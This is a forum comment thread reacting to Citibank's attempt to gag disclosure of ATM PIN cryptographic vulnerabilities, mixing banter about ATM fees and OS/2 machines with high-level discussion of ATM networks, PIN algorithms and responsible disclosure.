Citibank Tries to Hush ATM Crypto Vulnerability

palme999 writes "Citibank is trying to get a gag order for new vulnerabilities found in the cryptographic equipment commonly used to protect the PINs of ATM transactions. The vulnerabilities came to light during a court case involving 'phantom' ATM transactions that users deny making but that banks still charge to customers accounts because they claim their systems are secure."

Fees...

[RyansPrivates]

I love ATM fees. I can use a 'FREE' ATM and still am charged a fee from my own bank! With all this dough they are raking in, they should be COMPLETELY secure!!!

Re:Fees...

[Lawbeefaroni]

They're not completely secure because if they were, it would put a dent in all that dough they're raking in. Security through obscurity is free, security that is secure isn't.

Re:Fees...

[Old+Wolf]

This isn't security through obscurity - unless you would include in "obscurity" the need to keep your password secret!

Re:Fees...

Then get a better bank. Some banks not only do not charge you to use other banks' ATMs, but they go even further. They'll refund other banks' service charges for using their ATMs. Then you don't have to go running all over town looking for a free ATM.

You, as a consumer, have a choice. You don't have to take it up the ass if you don't want to.

Re:Fees...

I love ATM fees. I can use a 'FREE' ATM and still am charged a fee from my own bank!

Corporations seem to get away with more crap in the US. The banks tried this stunt in the UK but had to back down after about a month and scrap the charges.

OTOH we let the government get away with too much...

Re:Fees...

[Twylite]

Perfect security is perfectly unusable. The weakest point in the security of the global financial system is the end user.

A trivial PIN attack takes on average 5000 guesses, and can be conducted by inserting a stolen card into the same or different ATMs 2500 times. An even more simple attack obtains the PIN in one attempt with 80% certainty, and involves nothing more than a gun.

Newer systems will (in the future) employ Smart Cards for security. Unfortunately it is possible to retrieve secret data from most Smart Cards with $30,000 of equipment, and even duplicate them for a little more.

Biometrics are esaily fooled and, as most security conscious people should know, serve as identification rather than authentication mechanisms. As usual, a Smith & Weston beats a Smart Card, retinal scan, DNA fingerprint and 357 digit PIN. Bummer.

Which of course, if you think about it, means that it is in the consumers interest that the banking system has weaknesses. Case in point: car alarms and immobilisers have increased the incidence of hijacking; later anti-hijack devices increased the incidence of kidnapping and murder in association with hijacks. Leaving your keys in the ignition involves significantly less trauma and threat to life.

At some point, security becomes so inconvenient that no-one wants to use the system anymore. i.e. a self-destruct.

ATM? I don't need no stinkin' ATM!

[zmcgrew]

Hehe.
The ATM in the WalMart by us runs Windows.
And it crashes, gives blue screens, and popup error messages all the time.

Who needs security when the system can't even run stabily?

Re:ATM? I don't need no stinkin' ATM!

[UberLord]

Who needs security when the system can't even run stabily?

That's like saying people on 56k dialup who are online for about an hour a day on average don't need firewalls.

Heck, I get a firewall up before I even think about going online!

Re:ATM? I don't need no stinkin' ATM!

[spasm]

really? where do you live? {grin}

Re:ATM? I don't need no stinkin' ATM!

[TheRaven64]

I've seen windows ATMs before (there's one near me that rugularly has a dhcp error dialog showing) but I recently went up to use one in one of the London stations. As I approached it crashed (Computers often do that to me.) It then went through the OS/2 boot-up sequence...

Re:ATM? I don't need no stinkin' ATM!

[unicron]

You'd have to go inside a WalMart though. That alone makes it not really an option.

Re:ATM? I don't need no stinkin' ATM!

[joshsisk]

Some places, especially smaller towns, only have Walmarts - because the Wal-Marts run every competitor out of business.

Re:ATM? I don't need no stinkin' ATM!

This is true...I work for a Credit Union, and all of our ATMs run OS/2.

Re:ATM? I don't need no stinkin' ATM!

[unicron]

Nothing I ever need to buy has a picture of Jeff Gordon on it, so I suspect I would be fine.

Re:ATM? I don't need no stinkin' ATM!

[joshsisk]

Do you need to buy groceries? In my girlfriend's home town, the only place to buy groceries within about 15 miles is a Wal-Mart... unless you count 7-11/Circle K's, which also are heavy on NASCAR imagery.

Many smaller towns are like this. Even in my home town (pop 250,000+), Super Wal-Marts are knocking many of the grocery stores out of business.

Re:ATM? I don't need no stinkin' ATM!

[lasmith05]

You know it's funny that you mention this... In my area I once saw an ATM crash badly... (and it turned out to be OS/2) This was Wellsfargo BTW.

Re:ATM? I don't need no stinkin' ATM!

[hazem]

It's not just Walmart - it's the people of the town who choose to shop there. If a majority of the people in a town continued to shop at their normal places, rather than the new Walmart, the Walmart would not do well, and old places would do fine.

But, most people will chose to pay $1.00 for a loaf of bread instead of $1.50. In that case, they are giving up the "old way" for that $0.50. It's their choice. You can't blame it all on Walmart.

Re:ATM? I don't need no stinkin' ATM!

[SN74S181]

What OS does your firewall run?

If you mean you click on a 'firewall' icon before you go online, ummm.....

Re:ATM? I don't need no stinkin' ATM!

[joshsisk]

I didn't blame it on anyone. I'm simply pointing out that some people can't shop anywhere BUT wal-mart, unless they want to drive miles and miles out of their way, in response to the guy who said that you should just avoid wal-mart.

Re:ATM? I don't need no stinkin' ATM!

[hazem]

I don't care for them much either. Unfortunately, most people put the cost issue as the most important.. and we get stuck like that.

Re:ATM? I don't need no stinkin' ATM!

I did some consulting work for Diebold and had access to their engineering department. OS/2 was the operating system they used in the ATM's they were building at that time. This was several years ago, so I don't know if it still hold true....

How do banks secure ATM lines?

[AcquaCow]

How do bank atm lines work anyways? Are they over phone or satelite? Has anyone ever managed to break into them remotely?

Re:How do banks secure ATM lines?

[Lxy]

The ATMs I've seen are POTS lines. The older machines actually dial up to somewhere, the newer ones either found a better way to do it or turned off the modem speaker. As for what's being done I don't know, but doing RSA over PPP sounds like a decent, flexible option.

Re:How do banks secure ATM lines?

[SquadBoy]

They are some kind of leased line. We have customers that run on Frame, ISDN, and yes even dialup but mostly they go into some kind of Frame cloud. No they are not satelite and although a few people are trying to do them over VPNs it is for obvious reasons thought of as being a *very* bad thing. While this does not apply to what they are talking about in the article they mostly use 3DES for all the traffic that goes over the line. So an attacker could most likely wardial and find the dial backup lines and try to get in that way. But why bother with that when most places have dial in lines on their mainframes. Other than that if you had or could get access to the Frame cloud you could try. But at least the ones I work with are *very* hardened and most likely not worth the time /effort to break them remotly because it is hard to get cash over a line and breaking a ATM does not really get you into the mainframe. Far better and easier to try to break the mainframe mostly because there are far more ways to get to them and banks etc. do not pay nearly as much attention to security as you would think. This in spite of the fact that I yell at people all day long on the subject but I'm just one guy and they consider me paranoid. Gawd I hate people. Anyway hope the above answers your questions which could be summed up as I've never heard of anybody breaking them remotely and it would be *very* hard to do so.

Re:How do banks secure ATM lines?

[greechneb]

Basically, there are two options for an ATM,

Either POTS (plain old telephone service) with a modem dialing in to a service provider, whether it be the bank itself, or outsourced.

or Leased Line - always connected to the service provider.

Encryption is going towards all triple DES encryption within the next year. The ATMs that I have been dealing with all run a form of OS2 for the operating system.

The majority of ATMs just have a dial up line that is set to block incoming calls, so the only connection is being made from the ATM to the service provider.

Re:How do banks secure ATM lines?

[froth]

Everyone has mentioned that ATMs use POTS. This is true. But most of them use a dial-back feature to increase secuirty. They phone home (a pre-configured number, the only way to change this number is to physically open the ATM), hang up and wait for the return call. They will not answer unless they have called out first. ATMs are pretty damn secure.

Re:How do banks secure ATM lines?

Has anyone broke in, Yes. unsolved crime using an Apple ][, a 3 day weekend, and dressing up like a road crew.

Re:How do banks secure ATM lines?

[Rich0]

No they are not satelite and although a few people are trying to do them over VPNs it is for obvious reasons thought of as being a *very* bad thing.

You mean like running your ATM network from a system accessible by the general internet?

Re:How do banks secure ATM lines?

[sidvishus9]

http://www.sgpd.com/Crime_Prevention/ATM_Security/ atm_security.html "Shield" with your body. I think this would do more to increase security than anything else.

Re:How do banks secure ATM lines?

Dial-up or kilostream, normally. PIN traffic is hashed with the account number to prevent replay attacks and encrypted using DES (soon to be triple DES).

It's virtually impossible to mount a successful attack from outside. The vulnerable part used to be inside the machine, between the keypad and the encrypting device, where the PIN travels in clear down a short cable. Bent engineers have actually planted devices (like Psion handhelds) inside ATMs to capture PINs and card numbers! This is currently being addressed by retro-fittable keypads which do the encryption themselves, so there are no cables to tap.

This exploit for the ATM system (like the one last year for IBM 4758 cryptoprocessors) requires privileged access and would have to be an "inside job". The fix is also relatively simple - ensure no-one can frig about with the decimalisation table in the Host Security Module. Typically only two or three people in the bank have access to these boxes; they usually require more than one person to unlock the case and get to the keypad, so you can't just hack in and change the tables over the corporate network.

Re:How do banks secure ATM lines?

[trolman]

How do banks secure ATM lines?

With closed communications lines, a little crypto, some intrusion detection, and a lot of secrecy.

Re:How do banks secure ATM lines?

Gawd I hate people.

As a sysadmin, security nut, and sometime fellow misanthrope, I just want to point out: this is what's making you ineffective. The sole point of better information security (or anything else about IT) is people. Learn to love people and understand why they do what they do, and you'll not only be happier, you'll be far better able to have a real positive influence on the security issues that concern you.

Sorry if that sounds all preachy and virtuous, it's just that this is still a somewhat recent revelation for me (last few years). But it really works (and nothing else ever did).

Rationality is a human invention. When people seem to be acting in frustratingly irrational ways, there's nearly always a good reason for it. You just need to adjust your own use of Reason to compensate. Actually caring about users gets you halfway there, because you can see what it's like from their POV.

Re:How do banks secure ATM lines?

[Old+Wolf]

Here they use X.25 (traveling via the PSTN to get to the X.25 network). The X.25 protocol includes security so that you can't forge a source address. The communications aspect is considered to be secure, which is why this attack is happening at the HSM level.

Re:How do banks secure ATM lines?

[rusty0101]

There are several different methods used.

There are two basic ATM types. IP connected, and bisync/sdlc connected.

IP connected use routers with frame and dedicated circuit connections. Some may be using VPNs with ISPs, but none that I have worked with do.

Biysnc/sdlc connected atms may use a link converter to become effectively IP connected ATMs. As new ATMs come out, those connected via link converters are being replaced.

Those atms that are not connected via a link converter and ip based network use one of three types of connection. Point to point, point to multi-point, and dial. Point to point and point to multi-point may use either analog or digital leased lines.

Dial up atms use a "modem" that acts as a remote front end for the back end system.

Encryption of the data on the line is handled by the end points. Links between the banks that allow information about your account to be retrieved, or approval for debits and deposits to happen at the atm are also encrypted at several points. Both end point computers encrypt their transactions, the lines themselves use encryptors as well.

There are some variations to these designs. Each ATM provider uses their own design, and may use a variety of methods to implement ATMs in a particular region, simply to prevent one problem taking down all of the ATMs in an area.

I have seen atms implemented using CDPD for temporary instalations.

Satelite connected installations are extreamly rare. The current network infrastructure via sattelite is either extreamly expensive with low latency, as for example Iridium, or reasonable cost with high latency, via geo-stationary sats. 30Mm adds a 10th of a second in each direction just for speed of light. In a polled environment (bisync/sdlc) a half second delay for each polled device would make atm responsiveness extreamly unpleasent. A bisync line supports up to 32 devices. With Geosync sats, that means that there would be a built in 16 second delay between polls. SDLC supports up to 255 devices, or over 2 minutes. With the existing latency in the back end, getting that kind of a delay in your transactions would be extreamly unpleasent.

The situation may change if prices improve for GlobalStar, but I wouldn't expect it to be used any time soon.

As has been mentioned elsewhere, breaking into an atm remotely would be pretty much useless. You can not interact with the device over such a connection, no telnet, ftp or http servers, nor a command prompt interact with this line. So you will not be able to install data capture tools, or tell the atm to watch for your card and multiply your request authorizations.

As the article points out, you could spoof a withdrawl, but spoofing a deposit will be voided by no deposit in the atm.

I could be wrong however. Just remember that attempting a man in the middle attack for any connection across a telco connection constitutes wire fraud.

-Rusty

Re:How do banks secure ATM lines?

[Battle_Ratt]

This doesn't address the new breed of private ATM's. They just use a dedicated line to call direct to a network.

I know this because the guy my wife works for owns a few. The really funny thing about this is that the people who run some of the stores he puts his machines in, will unplug the phone line to it, and make long distance calls on his dime.

Re:How do banks secure ATM lines?

[rwise2112]

No they are not satelite

Actually some are satellite based. A few years ago, I was in Dawson City in the Yukon, and there was an ATM in town which had a note stuck on it explaining that the service often didn't work due to a loss of satellite signal.

Re:How do banks secure ATM lines?

You suck. I hate you. Shut the hell up and die.

Re:How do banks secure ATM lines?

[seaan]

As for what's being done I don't know, but doing RSA over PPP sounds like a decent, flexible option.

Nope, bzzzt play again! Sorry, did not mean to be impolite. The point-of-sale industry is extremely cost sensitive, and most POS terminals use the equivalent of an 8051 to perform the cryptography. You could theoretically do RSA, but it would take a long, long time. Smartcards will eventually change this, but don't hold your breath. The cost of putting an Ethernet port into a terminal is also pretty laughable.

My experience selling POS terminals is that the merchant will not pay $1 extra for 3 times the security, they want the absolute minimum cost! Canada had a very stringent specification (through interact), which at the time my terminal was one of the few that actually met it. The only problem was that instead of enforcing the standards, they granted everyone waivers so they could by insecure terminals that cost a few dollars less (seriously, something like $200 vs. $195). That was a few years ago, so one could optimistically hope things got better.

The POS terminals use single-DES (at least in the USA until 2005 or so, when they are scheduled to go to 3DES). Modem connection has become less common, as terminals connected to intelligent cash registers have become more popular (at least in the larger stores). The ANSI X9 provides the standards that govern cryptographic protocols for ATM and POS terminals.

cool

I've been using automated debit for years to pay all of my bills.

Maybe I can get all of that money back.

Another PIN vuln story

From The Register.

Re:Another PIN vuln story

It's the same guys and the same story, just another reporter talking about it.

Re:Another PIN vuln story

Yes, and it's ANOTHER story. Didn't say it was a similar story or a different story. This story is actually fairly accessible if you don't have a huge background in the subject.

Re:in case of /.

Nice formatting, why not go vomit on some toddlers while you're at it?

and only 15minutes ago..

[odyrithm]

I watched the atm(called a cash machine here in the UK) I was withdrawing from reboot.. was using os/2.. Im checking now to see if it actualy deducted from my account..

Re:and only 15minutes ago..

[odyrithm]

nope... but will have to wait 24hours really just to be sure... never trusted os/2 myself.. nething that runs windows like it did is ungodly.

Re:and only 15minutes ago..

[kfg]

For what it's worth, they're called "cash machines" here in the colonies as well.

A west coastism is to refer to twenty dollar bills as "Yuppie Foodstamps" because cash machines only dispense twenties, and thus people who rely on them never seem to have anything but.

KFG

Re:and only 15minutes ago..

[odyrithm]

kewl(cool for the nazies), you learn somthing everyday ;)

Re:and only 15minutes ago..

[LoadStar]

For what it's worth, they're called "cash machines" here in the colonies as well.

One "Wisconsin"-ism is to call ATM's "Tyme machines," mostly because the largest and most visible ATM network in the state was called "Tyme is Money" or just "Tyme" for short. EVERY machine you went to was a Tyme machine, so it just became common for everyone to call them that.

Two problems; going out of state, then asking locals "Where's the tyme machine" gets you _really_ strange looks, and now that Tyme was purchased by Pulse, there really aren't any Tyme machines anymore.

Re:and only 15minutes ago..

Heh, and in parts of the Midwest (US) we call them... TIME MACHINES! No really, we do. The main ATM company out here was Tyme, as in "Tyme is money".
... it sure makes you feel like an idiot when travelling and you ask where the nearest time machine is.

Re:and only 15minutes ago..

[L7_]

But there is no other way to tell if you're alive in Wisconsin unless you go to the Pulse Machine.

Re:and only 15minutes ago..

[klparrot]

A few years back I had a bank machine crash on me while I was depositing money. Luckily it was in a bank, and they were able to open up the back and get my money back. They rebooted it, and I watched OS/2 start up.

Release the lawyers!!!

[TopShelf]

The vulnerabilities came to light during a court case involving 'phantom' ATM transactions that users deny making but that banks still charge to customers accounts because they claim their systems are secure.

Does anybody smell a class-action for ATM users who have filed these complaints? It would probably work similarly to the CD price-fixing settlement that was in the news lately, since it would be hard to identify the specific members of the class.

Re:Release the lawyers!!!

[rgmoore]

It should be pointed out that this is a problem in the UK, but the US has saner legal rules. The article mentions that Citibank lost a similar case in the US, so apparently the US doesn't think that "our system is secure; it must be the user's fault" is sufficient defense.

Re:Release the lawyers!!!

[geekoid]

Actually, I would be happier with a settlement that forced atm usage to be free.

Re:Release the lawyers!!!

[stephanruby]

Actually, I would be happier with a settlement that forced atm usage to be free.

Why stop there? Why don't you force all business owners to let us use their phones for free?

Re:Release the lawyers!!!

[stephanruby]

"Actually, I would be happier with a settlement that forced atm usage to be free. "

My last post was labeled as a troll, I am offended. Hey I dislike atm fees as much as anybody else, but I don't see how forcing someone to provide a free service for the rest of us is going to help. Here is one argument against ATM fees. Its excerpt is lifted from the Cato institute at http://www.cato.org/dailys/8-27-98.html

"...If the senator were to look a little closer at the issue, he might realize that the recent boom in the ATM industry -- which has made life far more convenient for consumers -- is the result of increased ATM fees. And if consumers are prohibited from paying for ATM services, they may lose the vast ATM network they now enjoy.

Consumers in our fast-paced society value quick, convenient access to their money. The first people to realize that were not banks but private entrepreneurs, who saw that they could make a buck by placing ATMs in convenient locations. It was the ATM fee that allowed those companies, which have no other way to recoup their costs for providing and operating the machines, to meet consumer demand. From 1995 to 1996 the number of ATMs ordered from manufacturers increased 40 percent. The number of orders during that time exceeded the orders from 1991 to 1993. Approximately half of those orders were placed, not by "big banks," but by non-banking companies that make most of their revenue from ATM fees.

The fact that this growth occurred after the two largest ATM networks in the country (Cirrus and Plus) rescinded their ban on surcharges is no coincidence. ATMs in more convenient locations mean that consumers save time and money. Bank customers demand this convenience, and they are willing to pay for it.

In the past, when there were no charges for ATM use, there were far fewer ATMs. A low-cost ATM needs at least 3,000 transactions a month to break even. With a fee, that number is cut to 500.

But consumers often say, "I used to get this service without a fee, so why do I have to pay now?" The reason is that ATMs are not free. In the past, when there were no charges for ATM use, there were far fewer ATMs. A low-cost ATM needs at least 3,000 transactions a month to break even. With a fee, that number is cut to 500. Economist David Humphrey of Florida State University found that, although early studies of ATMs predicted savings for banks, the reality is that banks are actually taking a loss to provide this convenience. The consulting firm of McKinsey & Co. estimates that ATMs have cost the industry $1.5 billion and saved only $200 million.

Banks, like all businesses, want to make money. If they are going to lose money on a service, they will not provide it. With ATM fees, banks and non-bank ATM owners can place ATMs in places that were once not cost justified. Those places include grocery stores, convenience stores, airports and many other sites where people are happy to pay for quick access to cash. As a result, consumers don't have to drive 20 minutes across town to get money out of the bank; instead, they can choose to pay the fee for the convenience of ATMs.

Many smaller banks also complain because they cannot support vast ATM networks, which are common to larger banks. At the Senate hearings, Wayne Cottle, president of the Dean Co-operative Bank in Franklin, Massachusetts, expressed his fear "that there will be a substantial deposit migration away from my institution." In other words, "I cannot compete in this economy, therefore the government should protect me." Is that any way to run our economy?

In the American economy, firms that do not provide the services consumers demand are replaced by those that do. What has made this county's economy so prosperous is its refusal to interfere with competition and innovation. Competition is not something the banking industry lacks, given its 200,000 ATMs and 10,000 financial institutions. That free and open competition led to the invention of the ATM in the first place.

Another important fact to remember is that getting access to your money without a fee is still very easy. Customers can write a check, use a debit card or credit card or simply visit their own bank's ATMs. Those who value convenience less still have other options for getting money, while those who would prefer to pay for this convenience can do so. If Senator D'Amato gets his wish, consumers will lose not only the fees that he despises so much but also the large network of ATMs on which consumers have come to rely. "

For a longer pdf report, go to http://www.cato.org/pubs/briefs/bp-036.pdf

Re:Release the lawyers!!!

[stephanruby]

If you forced atm usage to be free, four interelated things would happen

(1) ATM providers would decrease the number of ATMs they have around

(2) ATM providers would decrease the maintainance of the ATMs that already exist

(3) People would switch their accounts to smaller banks with fewer ATMs (since the number of ATMs at a bank has wouldn't matter to them anymore)

(4) Long lines would start to form at popular ATMs

(5) ATMs would be harder to find and less convenient

(6) Since all those effects reinforce each other, recurse ad infinitum and go back to step (1), (2), (3), (4), (5), and (6)

Legal fees

[hafree]

I wonder how much that court case cost to take on a huge corporation like Citibank because they blatantly charged you $1 per transaction for a dozen transactions that never happened last month. Hardly seems worth the effort to save $12, but I'm glad someone is fighting for the little guys...

Re:Legal fees

i have a feeling its more about the withdrawl that was those transactions then its is about the 1 dollar fees that they are suing over

Re:Legal fees

Yeah, but if they are claiming you withdrew $300 on each of those 12 transactions, you certainly would find the effort to take them to court for that.

Shut them up!

We all want this to happen! Citi will fix it because it is in the best interest of their customers. Releasing the info would increase the risk of **YOUR** money stolen. Give them time, but follow up with them to ensure it is fixed.

Re:Shut them up!

[Daniel+Dvorkin]

Um ... you're kidding, right?

Citibank has no interest in "the best interest of its customers." Like any other megacorp, they don't give a shit about you. They're much more concerned about the embarrassment of admitting that their security is worthless than they are about actually keeping people's money safe. The only way to get them to fix this problem is to publicize it as loudly as possible, because then not fixing the problem becomes even more of an embarrassment for them.

Re:Shut them up!

[dubiousmike]

He's right. My uncle-in-law is one of the heads of Citibank's private label card division (Home Depot credit card, various chain store credit cards).

He definitley doesn't give a shit.
But he does enjoy being rich as fuck.

Can't say I blame him on that last part. He makes my yearly salary every month.

Re:Shut them up!

[antis0c]

Did you even read any of it? Citi believes there system is 100% secure! They're trying to hush this so they can continue to say it is. Chances of them fixing it are very low. Remember, Citi is in the business to make money. If they can use their lawyers to hush up talk about the security vulnerabilities, then they consider the problem fixed. It's like Microsoft, security through obscurity. "If no one knows about the problem it's not a problem is it?"

Re:Shut them up!

[bongoras]

actually, I'm sure they'll fix the vulnerability anyhow -- lest they risk lawsuits. However, if they can keep this information out of the public eye, they can fix it slowly over years of routine ATM machine upgrades, instead of spending how-many-millions to replace the crypto units in every ATM machine in the UK. That's the way companies think -- that because something is out of the public eye, and they are showing 'due diligence' in repairing the problem, that's better then admitting they fucked up and fixing it. Now they will probably define 'due diligence' as having a replacement schedule for the faulty hardware. That schedule might be 'wait until the shit breaks anyway' but as long as they have a plan they think they are covered. Solution: someone who doesn't mind jail time should steal money from the bank president' accounts. :-)

Re:Shut them up!

[ATMAvatar]

actually, I'm sure they'll fix the vulnerability anyhow -- lest they risk lawsuits.

Straight from the article:

Curiously enough, Citi was also the bank in the case that set US law on
phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope that's
an omen, if not a precedent ...

The legal precedent is that you're outta luck, should someone exploit these vulnerabilities. Citibank knows this. Without the vulnerabilities becoming public knowledge, Citibank has zero reason to fix them. Over time or all at once... it takes money and effort to fix problems, and so long as they're immune to the ill effects of the vulnerabilities, why would they spend the resources to fix it? From Citibank's point of view, it's not a problem.

Re:Shut them up!

The bank does not give a damn. They consider a fraud an operational cost that is well-calculated in the scheme. They are fine living with mediocre security because it'd cost them more to implement a more secure and more modern solution that it costs them to deal with some abuses.

If the issue is released to the public, they face some image problems, and the risk of an attack is becoming more serious, and they would have to fix that. Good.

Re:Shut them up!

updating a shitload of atms could take years..I do understand SOME of the reasons behind not making it public, but if it is made public, I guess that will light the fire under their proverbial asses

Tell 'em to prove it.

[Dolemite_the_Wiz]

If Citibank sez that their systems are secure. Tell 'em to prove it.

Dolemite

Re:Tell 'em to prove it.

[Beryllium+Sphere(tm)]

That's actually not far from the winning strategy in a court case described in Ross Anderson's wonderful book, "Security Engineering".

A bank customer tried to get an unauthorized withdrawal reversed, and the bank responded by hauling him into court on fraud charges.

The bank argued that their systems were infallible. The defense said the legal equivalent of "prove it", demanding to run an independent review of the bank's security practices.

The bank suddenly lost interest in trying to imprison their customer.

dmca problems, again?

[micq]

This is the kind of shit that scares me about the DMCA...

So easy to read!

Thanks for making sure it looked okay!

New System

[alaric187]

Oh you guys, that's just Citibank's patented Security Through Litigation (tm) method. I hear it works wonders on keeping financial info secure.

This was covered at k5 also

Mostly it affects where banks choose your pin for you (which happens in the UK among other places) based upon a hash of your account number. Not that a 4 digit pin was particularly strong an encription method, but this paper merely says it's even weaker when based of the users account number. However, it seems this crack is most easily acheived by an insider, not your local script kiddie with Aunt Edna's ATM card.

Read more here:
http://www.kuro5hin.org/story/2003/2/20/61350/0548

Re:This was covered at k5 also

[Dudio]

Mostly it affects where banks choose your pin for you (which happens in the UK among other places) based upon a hash of your account number.

While technically true, the catch is that this applies to a lot of PINs, even those chosen by the cardholder. When you set your own PIN, the bank just stores an offset that is used in conjunction with the autogenerated PIN. The vulnerability paper goes into this in section 3.

Re:This was covered at k5 also

[seaan]

When you set your own PIN, the bank just stores an offset that is used in conjunction with the autogenerated PIN.

This is true in one of the most common algorithms, commonly known within the industry as the "IBM 3624" (named after an older ATM model I believe). The algorithm takes an account number, a secret key, and some configuration information and produces something called a "natural PIN". As mentioned above, a customer selected PIN results in an offset that is applied to the natural PIN.

There are however a variety of other PIN Verification Number (PVN) algorithms that don't produce a natural PIN. Instead the PIN is another input into the hash algorithm, and the resulting value cannot accurately be called an offset. A good example is another algorithm mentioned in the paper - the Visa PVV (this algorithm is also superior to the 3624 algorithm for a variety of reasons, including use of 3DES process instead of single-DES, and superior resistance to broken PINs).

right to know

[dougnaka]

The statements made by Citibank regarding their security can only be trusted as far as they are independently evaluated. Consumers in general, and especially Americans, rely far too heavily on a companies claims. If a company makes false claims these days they often simply ignore the facts, and that enough is wrong. But when someone comes out with evidence that a company is making false claims, and the company tries to silence them? That is outright immoral, and should be illegal.

Why is it they can even try things like this without massive public backlash? They would be far better off accepting the "new" information, and promising to work hard to always keep their systems secure.

I'm sure certian companies would love to see legal actions like this get upheld by a court.... Oh well, I guess we can always move to Norway... I wonder if they'd let me live on sealand once all my rights are gone here...

Re:right to know

The Tobacco industry is far more professional in public deception and PR. In the end they coughed up. Radar speed detectors being infallible.. the claims keep on coming, Asbestos, DVT on planes, and withdrawals are safe (as the Billings method).

Cases still need to be decided on probabilities, not assurances.
If assurances made wre knowingly false, then outcomes are distorted. To use that information for personal or corporate gain, should be a crime.

Re:right to know

[dougnaka]

Agreed, and I would say that their previous claims and assurances were made in "good faith" and Citibank could therefore no be held liable, but once they know about it any further claims or assurances are complete lies.

Re:right to know

[KernelHappy]

All processors in the debit card industry are required to have their security procedures audited. This includes extensive documentation of any change made to production code, handling of master encryption keys, database maintenance etc. It's not that the companies don't answer to someone, it's that the someone they answer to either doesn't see the weakness or realizes the huge cost involved in rectifying these problems and ignores it.

Re:right to know

[gene_tailor]

> Consumers in general, and especially Americans

Why do you say especially Americans? Just curious...

Re:right to know

[dougnaka]

because 1. I am one, and primarily know Americans. 2. Most people I've known while I've lived outside thte US have been more skeptical of companies claims. and 3. because poking Americans gets you points with moderators...

Re:right to know

[SpaceLifeForm]

Mods, save your points for me since I'm going to be poking my GF later.

This is SERIOUS

[arvindn]

This isn't like on of the regular "a new vulnerability has been discovered. No exploitz are known yet. Patch can be found " kind of things we get on bugtraq all the time.

From the article

For the last couple of years or so there has been a rising tide of phantoms. I get emails with increasing frequency from people all over the world whose banks have debited them for ATM withdrawals that they deny making. Banks in many countries simply claim that their systems are secure and so the customers must be responsible. It now looks like some of these vulnerabilities have also been discovered by the bad guys.

What the bank is doing is very irresponsible. I hope they get lots of bad publicity for this. Getting on /. is a good start.

Re:This is SERIOUS

[dachshund]

It now looks like some of these vulnerabilities have also been discovered by the bad guys.

Of course, this isn't necessarily the case. Note that this particular scheme would require a insider in the bank with access to the pin-verification system. Until somebody verifies that, or at least combs through the logs to look for patterns of suspicious PIN guessing, any connection between the increase in phantom withdrawals and this vulnerability is pure speculation.

Re:This is SERIOUS

[mosch]

Yes, but the banks are claiming that the system contains no vulnerabilities at all. The presence of any vulnerability demonstrates that the banks are being less than honest with the courts.

Last I checked, it's significantly illegal to be less than honest with the courts.

Re:This is SERIOUS

[Hammerikaner]

Everyone should just mirror the PDF file on your own web server. Would it matter then, if the court filed an injunction? Everyone already has it.

Re:This is SERIOUS

[gr0nd]

The bugtraq post has lots of links:

>To: ukcrypto@chiark.greenend.org.uk
>Subject: Citibank tries to gag crypto bug disclosure
>Date: Thu, 20 Feb 2003 09:57:34 +0000
>From: Ross Anderson
>
>
>Citibank is trying to get an order in the High Court today gagging
>public disclosure of crypto vulnerabilities:
>
> http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_g ag.pdf
>
>I have written to the judge opposing the order:
>
> http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_r esponse.pdf
>
>The background is that my student Mike Bond has discovered some really
>horrendous vulnerabilities in the cryptographic equipment commonly
>used to protect the PINs used to identify customers to cash machines:
>
> http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560 .pdf
>
>These vulnerabilities mean that bank insiders can almost trivially
>find out the PINs of any or all customers. The discoveries happened
>while Mike and I were working as expert witnesses on a `phantom
>withdrawal' case.
>
>The vulnerabilities are also scientifically interesting:
>
> http://cryptome.org/pacc.htm
>
>For the last couple of years or so there has been a rising tide of
>phantoms. I get emails with increasing frequency from people all over
>the world whose banks have debited them for ATM withdrawals that they
>deny making. Banks in many countries simply claim that their systems
>are secure and so the customers must be responsible. It now looks like
>some of these vulnerabilities have also been discovered by the bad
>guys. Our courts and regulators should make the banks fix their
>systems, rather than just lying about security and dumping the costs
>on the customers.
>
>Curiously enough, Citi was also the bank in the case that set US law
>on phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope
>that's an omen, if not a precedent ...
>
>Ross Anderson

Re:This is SERIOUS

[kchayer]

or at least combs through the logs to look for patterns of suspicious PIN guessing

I don't know if all banks do this, but at one my wife used to work at, if you entered a PIN incorrectly 3 times in a row on one card, the ATM machine would eat the card and refuse to return it. The people emptying and refilling ATM canisters (one of the things my wife did) would find these cards and destroy them. The customer was forced to get a new one (which I think was free). That would at least limit PIN guessing, unless you really want to be diligent about visiting different ATMs...if you're looking to rip people off, there are probably easier ways.

I imagine many banks would flag a bunch of invalid attempts at least. And the above mentioned method obviously doesn't work in ATMs where you swipe your card, as opposed to inserting it into a slot.

Re:This is SERIOUS

[poot_rootbeer]

Why do you assume that the "bad guys" who are exploiting the vulnerability AREN'T employed by the bank itself? There's no proof that Citibank isn't to blame except Citibank's own word.

Re:This is SERIOUS

[dachshund]

According to the researchers, the attack would really require direct access to the bank's pin-verification computer (Hardware Security Module) in order to be useful.

They also note that you can avoid traps that rely on a series of bad PIN entries by mixing your "guesses" with valid requests from the card's owner.

Re:This is SERIOUS

[Old+Wolf]

When was the last time there was a court case where the defence didn't tell lies?

Re:This is SERIOUS

Where do i send those emails again?

There are several large withdrawls on my account that I ... uh ... didn't make. Yeah, that's it. I never withdrew that money, so Citibank needs to give it back. To me. Now.

Please?

Re:This is SERIOUS

[namespan]

Last I checked, it's significantly illegal to be less than honest with the courts.

A fact which has to be legally verified, unfortunately, a game which, if you've got the resources, you can play until people get sick of chasing you, or until you misdirect them sufficiently.

Look at Clinton. Almost certainly committed perjury. Did he even get a wrist slap (other than losing a lot of respect)?

Re:This is SERIOUS

"Until somebody verifies that, or at least combs through the logs to look for patterns of suspicious PIN guessing,"

Assuming whoever is inside and can attempt the attack cannot clean up ther logs.

Re:This is SERIOUS

[Beryllium+Sphere(tm)]

What logs?

Notice that one of the proposed fixes was to create an audit trail.

Re:This is SERIOUS

and prosecutors are always honest, right?

Re:This is SERIOUS

the ATM machine would eat the card and refuse to return it.

I've only seen ONE ATM that physically pulled in your card. All the rest I've ever seen are the 'swipe your card' or 'dip your card' types. Neither of these can "eat" your card.

Where are you that you have ATMs that pull in your card?

Re:This is SERIOUS

